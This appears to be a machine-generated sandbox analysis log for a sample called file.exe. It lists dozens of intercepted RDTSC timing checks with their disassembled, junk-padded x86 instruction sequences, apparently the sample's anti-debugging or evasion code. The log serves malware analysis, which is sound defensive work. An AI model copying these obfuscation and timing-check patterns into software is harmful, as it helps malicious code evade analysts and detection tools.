Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55502C5 second address: 555030E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 9502h 0x00000007 mov dx, FF4Eh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 call 00007F76D8D60512h 0x00000015 pushfd 0x00000016 jmp 00007F76D8D60512h 0x0000001b and al, FFFFFFC8h 0x0000001e jmp 00007F76D8D6050Bh 0x00000023 popfd 0x00000024 pop eax 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 555030E second address: 5550340 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D9275005h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007F76D9275003h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5550340 second address: 55503AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D8D60514h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a pushad 0x0000000b jmp 00007F76D8D6050Eh 0x00000010 mov dx, ax 0x00000013 popad 0x00000014 push eax 0x00000015 pushad 0x00000016 call 00007F76D8D6050Dh 0x0000001b mov ebx, eax 0x0000001d pop eax 0x0000001e mov edx, 3FCEC830h 0x00000023 popad 0x00000024 xchg eax, edi 0x00000025 pushad 0x00000026 mov ch, dh 0x00000028 mov ax, E11Dh 0x0000002c popad 0x0000002d mov eax, dword ptr [75AF4538h] 0x00000032 pushad 0x00000033 movzx eax, dx 0x00000036 jmp 00007F76D8D6050Bh 0x0000003b popad 0x0000003c xor dword ptr [ebp-08h], eax 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 popad 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55503AB second address: 55503AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55503AF second address: 55503B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55503B5 second address: 5550427 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F76D9275008h 0x00000009 add esi, 2D9FA208h 0x0000000f jmp 00007F76D9274FFBh 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F76D9275008h 0x0000001b and eax, 4FB4C468h 0x00000021 jmp 00007F76D9274FFBh 0x00000026 popfd 0x00000027 popad 0x00000028 pop edx 0x00000029 pop eax 0x0000002a xor eax, ebp 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F76D9275002h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5550427 second address: 555042D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 555042D second address: 5550431 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5550431 second address: 555044B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D8D6050Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 555044B second address: 5550451 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5550451 second address: 555047F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F76D8D60510h 0x00000008 mov bh, ah 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F76D8D60513h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 555047F second address: 55504F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, ax 0x00000006 movzx eax, dx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d pushad 0x0000000e push edx 0x0000000f pop eax 0x00000010 popad 0x00000011 lea eax, dword ptr [ebp-10h] 0x00000014 pushad 0x00000015 mov ecx, 1558A1DFh 0x0000001a popad 0x0000001b mov dword ptr fs:[00000000h], eax 0x00000021 pushad 0x00000022 mov edi, eax 0x00000024 call 00007F76D9275008h 0x00000029 mov di, ax 0x0000002c pop ecx 0x0000002d popad 0x0000002e mov dword ptr [ebp-18h], esp 0x00000031 jmp 00007F76D9274FFDh 0x00000036 mov eax, dword ptr fs:[00000018h] 0x0000003c pushad 0x0000003d push eax 0x0000003e call 00007F76D9275003h 0x00000043 pop eax 0x00000044 pop edi 0x00000045 pushad 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55504F0 second address: 555055F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movzx esi, dx 0x00000007 popad 0x00000008 popad 0x00000009 mov ecx, dword ptr [eax+00000FDCh] 0x0000000f jmp 00007F76D8D6050Dh 0x00000014 test ecx, ecx 0x00000016 pushad 0x00000017 mov cl, FCh 0x00000019 push edi 0x0000001a movzx ecx, bx 0x0000001d pop edi 0x0000001e popad 0x0000001f jns 00007F76D8D60516h 0x00000025 pushad 0x00000026 movsx edx, cx 0x00000029 popad 0x0000002a add eax, ecx 0x0000002c pushad 0x0000002d mov eax, 18AFFD2Dh 0x00000032 mov edi, esi 0x00000034 popad 0x00000035 mov ecx, dword ptr [ebp+08h] 0x00000038 jmp 00007F76D8D60514h 0x0000003d test ecx, ecx 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007F76D8D60517h 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55401BC second address: 554023D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D9275005h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c pushad 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F76D9274FFAh 0x00000014 sub ax, D718h 0x00000019 jmp 00007F76D9274FFBh 0x0000001e popfd 0x0000001f jmp 00007F76D9275008h 0x00000024 popad 0x00000025 pushfd 0x00000026 jmp 00007F76D9275002h 0x0000002b adc ecx, 246E78A8h 0x00000031 jmp 00007F76D9274FFBh 0x00000036 popfd 0x00000037 popad 0x00000038 mov ebp, esp 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f popad 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 554023D second address: 5540241 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5540241 second address: 5540247 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5540247 second address: 554024D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 554024D second address: 5540251 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5540251 second address: 554027E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 sub esp, 2Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007F76D8D6050Dh 0x00000013 call 00007F76D8D60510h 0x00000018 pop eax 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 554027E second address: 5540284 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5540284 second address: 5540288 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5540288 second address: 55402A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D9274FFAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c pushad 0x0000000d pushad 0x0000000e mov dh, cl 0x00000010 mov cx, di 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55402A5 second address: 55402E3 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F76D8D60511h 0x00000008 or esi, 60F20636h 0x0000000e jmp 00007F76D8D60511h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F76D8D6050Ch 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55402E3 second address: 55402E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55402E9 second address: 55402ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55402ED second address: 5540343 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D9274FFDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F76D9274FFCh 0x00000013 jmp 00007F76D9275005h 0x00000018 popfd 0x00000019 mov ax, 99E7h 0x0000001d popad 0x0000001e xchg eax, edi 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F76D9275004h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5540343 second address: 5540347 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5540347 second address: 554034D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 554038D second address: 5540391 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5540391 second address: 5540397 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5540397 second address: 55403D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D8D60514h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub ebx, ebx 0x0000000b jmp 00007F76D8D60511h 0x00000010 sub edi, edi 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F76D8D6050Ah 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55403D0 second address: 554042C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D9274FFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 inc ebx 0x0000000a jmp 00007F76D9275006h 0x0000000f test al, al 0x00000011 pushad 0x00000012 pushad 0x00000013 jmp 00007F76D9275003h 0x00000018 popad 0x00000019 movzx ecx, di 0x0000001c popad 0x0000001d je 00007F76D9275182h 0x00000023 jmp 00007F76D9274FFBh 0x00000028 lea ecx, dword ptr [ebp-14h] 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 554042C second address: 5540430 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5540430 second address: 5540434 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5540434 second address: 554043A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 554043A second address: 5540440 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 554047D second address: 55404A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D8D60512h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F76D8D6050Eh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55404A4 second address: 55404AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55404AA second address: 55404AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55404AE second address: 55404B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5540559 second address: 55405BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D8D60519h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [ebp-14h], edi 0x0000000c jmp 00007F76D8D6050Eh 0x00000011 jne 00007F77492BE41Ah 0x00000017 pushad 0x00000018 call 00007F76D8D6050Eh 0x0000001d movzx eax, dx 0x00000020 pop edi 0x00000021 movzx ecx, di 0x00000024 popad 0x00000025 mov ebx, dword ptr [ebp+08h] 0x00000028 jmp 00007F76D8D6050Fh 0x0000002d lea eax, dword ptr [ebp-2Ch] 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55405BF second address: 55405C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55405C3 second address: 55405C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55405C7 second address: 55405CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55405CD second address: 55405EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F76D8D60518h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55405EA second address: 554066A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, esi 0x00000008 pushad 0x00000009 pushfd 0x0000000a jmp 00007F76D9274FFCh 0x0000000f and ah, FFFFFFD8h 0x00000012 jmp 00007F76D9274FFBh 0x00000017 popfd 0x00000018 pushad 0x00000019 mov ecx, 39B7DE25h 0x0000001e mov bx, cx 0x00000021 popad 0x00000022 popad 0x00000023 push eax 0x00000024 pushad 0x00000025 mov bl, ACh 0x00000027 pushfd 0x00000028 jmp 00007F76D9275006h 0x0000002d or ah, 00000068h 0x00000030 jmp 00007F76D9274FFBh 0x00000035 popfd 0x00000036 popad 0x00000037 xchg eax, esi 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b mov ch, dl 0x0000003d pushfd 0x0000003e jmp 00007F76D9274FFCh 0x00000043 and si, 58C8h 0x00000048 jmp 00007F76D9274FFBh 0x0000004d popfd 0x0000004e popad 0x0000004f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 554066A second address: 5540692 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D8D60519h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b mov dx, cx 0x0000000e push eax 0x0000000f push edx 0x00000010 mov cx, B135h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5540692 second address: 55406C1 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F76D9275002h 0x00000008 adc cx, 0D88h 0x0000000d jmp 00007F76D9274FFBh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 push eax 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a mov ecx, edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55406C1 second address: 55406F6 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F76D8D60511h 0x00000008 add ah, FFFFFFA6h 0x0000000b jmp 00007F76D8D60511h 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 mov ah, 97h 0x00000015 popad 0x00000016 nop 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55406F6 second address: 554070A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D9275000h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 554074F second address: 554076A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D8D60517h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 554076A second address: 5540770 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5540770 second address: 5540774 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5540774 second address: 5530DC7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, eax 0x0000000a jmp 00007F76D9275007h 0x0000000f test esi, esi 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F76D9275004h 0x00000018 adc ah, 00000028h 0x0000001b jmp 00007F76D9274FFBh 0x00000020 popfd 0x00000021 mov ch, B7h 0x00000023 popad 0x00000024 je 00007F77497D2E8Ch 0x0000002a xor eax, eax 0x0000002c jmp 00007F76D924E72Ah 0x00000031 pop esi 0x00000032 pop edi 0x00000033 pop ebx 0x00000034 leave 0x00000035 retn 0004h 0x00000038 nop 0x00000039 cmp eax, 00000000h 0x0000003c setne cl 0x0000003f xor ebx, ebx 0x00000041 test cl, 00000001h 0x00000044 jne 00007F76D9274FF7h 0x00000046 jmp 00007F76D927516Bh 0x0000004b call 00007F76DD76F01Eh 0x00000050 mov edi, edi 0x00000052 pushad 0x00000053 push edx 0x00000054 mov si, C4B7h 0x00000058 pop esi 0x00000059 push eax 0x0000005a push edx 0x0000005b pushfd 0x0000005c jmp 00007F76D9275003h 0x00000061 add ax, F83Eh 0x00000066 jmp 00007F76D9275009h 0x0000006b popfd 0x0000006c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5530DC7 second address: 5530DCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5530DCB second address: 5530DF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 jmp 00007F76D9274FFCh 0x0000000d push eax 0x0000000e jmp 00007F76D9274FFBh 0x00000013 xchg eax, ebp 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 mov bx, 8526h 0x0000001b mov ax, di 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5530DF7 second address: 5530DFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5530DFD second address: 5530E01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5530E01 second address: 5530EAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F76D8D6050Eh 0x0000000f xchg eax, ecx 0x00000010 pushad 0x00000011 jmp 00007F76D8D6050Eh 0x00000016 call 00007F76D8D60512h 0x0000001b pushfd 0x0000001c jmp 00007F76D8D60512h 0x00000021 and ecx, 449FEC58h 0x00000027 jmp 00007F76D8D6050Bh 0x0000002c popfd 0x0000002d pop ecx 0x0000002e popad 0x0000002f push eax 0x00000030 pushad 0x00000031 pushfd 0x00000032 jmp 00007F76D8D60514h 0x00000037 or ecx, 370876B8h 0x0000003d jmp 00007F76D8D6050Bh 0x00000042 popfd 0x00000043 mov esi, 40072EEFh 0x00000048 popad 0x00000049 xchg eax, ecx 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d jmp 00007F76D8D60517h 0x00000052 pushad 0x00000053 popad 0x00000054 popad 0x00000055 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5540BD2 second address: 5540BD7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5540BD7 second address: 5540C39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F76D8D60515h 0x0000000a sub ecx, 7AD4FB66h 0x00000010 jmp 00007F76D8D60511h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d mov bx, 45EEh 0x00000021 pushfd 0x00000022 jmp 00007F76D8D6050Fh 0x00000027 jmp 00007F76D8D60513h 0x0000002c popfd 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5540C39 second address: 5540C3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5540C3F second address: 5540C43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5540D18 second address: 5540D1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5540D1E second address: 5540D43 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D8D6050Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 324EEC5Dh 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F76D8D6050Ch 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5540D43 second address: 5540D86 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ecx 0x00000005 push edi 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a add dword ptr [esp], 435FAFCBh 0x00000011 pushad 0x00000012 mov dx, 5608h 0x00000016 jmp 00007F76D9275001h 0x0000001b popad 0x0000001c call 00007F77497C9DFDh 0x00000021 push 75A92B70h 0x00000026 push dword ptr fs:[00000000h] 0x0000002d mov eax, dword ptr [esp+10h] 0x00000031 mov dword ptr [esp+10h], ebp 0x00000035 lea ebp, dword ptr [esp+10h] 0x00000039 sub esp, eax 0x0000003b push ebx 0x0000003c push esi 0x0000003d push edi 0x0000003e mov eax, dword ptr [75AF4538h] 0x00000043 xor dword ptr [ebp-04h], eax 0x00000046 xor eax, ebp 0x00000048 push eax 0x00000049 mov dword ptr [ebp-18h], esp 0x0000004c push dword ptr [ebp-08h] 0x0000004f mov eax, dword ptr [ebp-04h] 0x00000052 mov dword ptr [ebp-04h], FFFFFFFEh 0x00000059 mov dword ptr [ebp-08h], eax 0x0000005c lea eax, dword ptr [ebp-10h] 0x0000005f mov dword ptr fs:[00000000h], eax 0x00000065 ret 0x00000066 jmp 00007F76D9274FFEh 0x0000006b sub esi, esi 0x0000006d push eax 0x0000006e push edx 0x0000006f push eax 0x00000070 push edx 0x00000071 push eax 0x00000072 push edx 0x00000073 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5540D86 second address: 5540D8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5540D8A second address: 5540D8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5540D8E second address: 5540D94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5540E1A second address: 5540E32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F76D9275004h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55606DD second address: 556073E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D8D60519h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F76D8D6050Ch 0x00000011 jmp 00007F76D8D60515h 0x00000016 popfd 0x00000017 mov bl, cl 0x00000019 popad 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F76D8D60519h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 556073E second address: 5560763 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D9275001h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F76D9274FFDh 0x00000011 rdtsc
